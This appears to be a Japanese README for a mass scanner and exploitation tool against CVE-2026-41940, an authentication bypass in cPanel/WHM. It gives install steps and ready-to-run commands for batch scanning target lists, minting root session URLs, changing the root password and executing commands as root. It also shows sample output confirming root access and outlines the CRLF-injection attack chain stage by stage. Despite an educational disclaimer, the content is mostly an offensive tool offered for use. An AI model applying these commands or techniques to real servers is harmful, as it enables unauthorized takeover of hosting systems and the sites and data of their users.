
cPanel/WHM CVE-2026-41940 - マススキャナー & エクスプロイター
CVE-2026-41940 用 cPanel/WHM 認証バイパススキャナー&エクスプロイトツール
このツールは、教育目的および許可されたセキュリティテスト専用として提供されています。
このツールを使用することにより、以下に同意したものとみなされます:
❗ 著者は、本ツールの使用から生じる誤用、違法行為、損害、または法的結果について一切責任を負いません。
CVE-2026-41940 は、cPanel/WHM における重大な認証バイパス脆弱性であり、攻撃者が有効な資格情報なしに不正なルートレベルアクセスを取得できる可能性があります。
このツールは、以下のための Python ベースの実装を提供します:
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| フィールド | 値 |
|---|---|
| CVE | CVE-2026-41940 |
| 重大度 | 緊急(CVSS 9.8) |
| 攻撃ベクトル | ネットワーク |
| 必要な権限 | なし |
| ユーザー操作 | なし |
-hostname が必要です安全かつ合法的なテストのために:
このプロジェクトが役に立ったなら、⭐ を付けることを検討してください
| ステージ | 説明 |
|---|
| 1. 事前認証 | /login/ に無効な資格情報を送信して whostmgrsession クッキーを取得 |
| 2. CRLF インジェクション | Authorization: Basic ヘッダーを介して改行を注入し、cpsess トークンを漏洩させる |
| 3. トークンの伝播 | do_token_denied をトリガーしてキャッシュにトークンを伝播させる |
| 4. 検証 | /json-api/version にアクセスして WHM ルートアクセスを確認 |
| 機能 | 説明 |
|---|
| 🔄 バッチスキャン | 複数のターゲットを同時にスキャン |
| 🎯 単一ターゲット | 詳細な出力で個別ターゲットをスキャン |
| 🔌 ポートスキャン | WHM ポート(2082, 2083, 2086, 2087)を自動スキャン |
| 🔓 セッション URL | ワンクリック WHM ログイン URL を生成 |
| 💀 RCE | ルートとしてシステムコマンドを実行 |
| 🔑 パスワード変更 | WHM ルートパスワードを変更 |
| 📡 WHM API 呼び出し | WHM API 関数を呼び出し |
| 🎨 カラー出力 | 結果の視覚的出力 |
| 💾 結果のエクスポート | 脆弱なターゲットをファイルに保存 |
| パラメータ | 説明 | 例 |
|---|
| -u | 単一ターゲット URL | -u https://target.com:2087 |
| -f | ターゲットリストファイル | -f targets.txt |
| -c | 並行数(スレッド) | -c 20 |
| -o | 出力ファイル | -o results.txt |
| -hostname | カスタム Host ヘッダー | -hostname cpanel.target.com |
| --scan-ports | すべての WHM ポートをスキャン | --scan-ports |
| -session | ログイン URL を生成 | -session |
| -passwd | ルートパスワードを変更 | -passwd "NewPass123" |
| -cmd | コマンドを実行 | -cmd "id" |
| -keep | 一時アカウントを保持 | -keep |
| -api | WHM API を呼び出し | -api listaccts |
| -api-params | API パラメータ | -api-params "user=root,password=123" |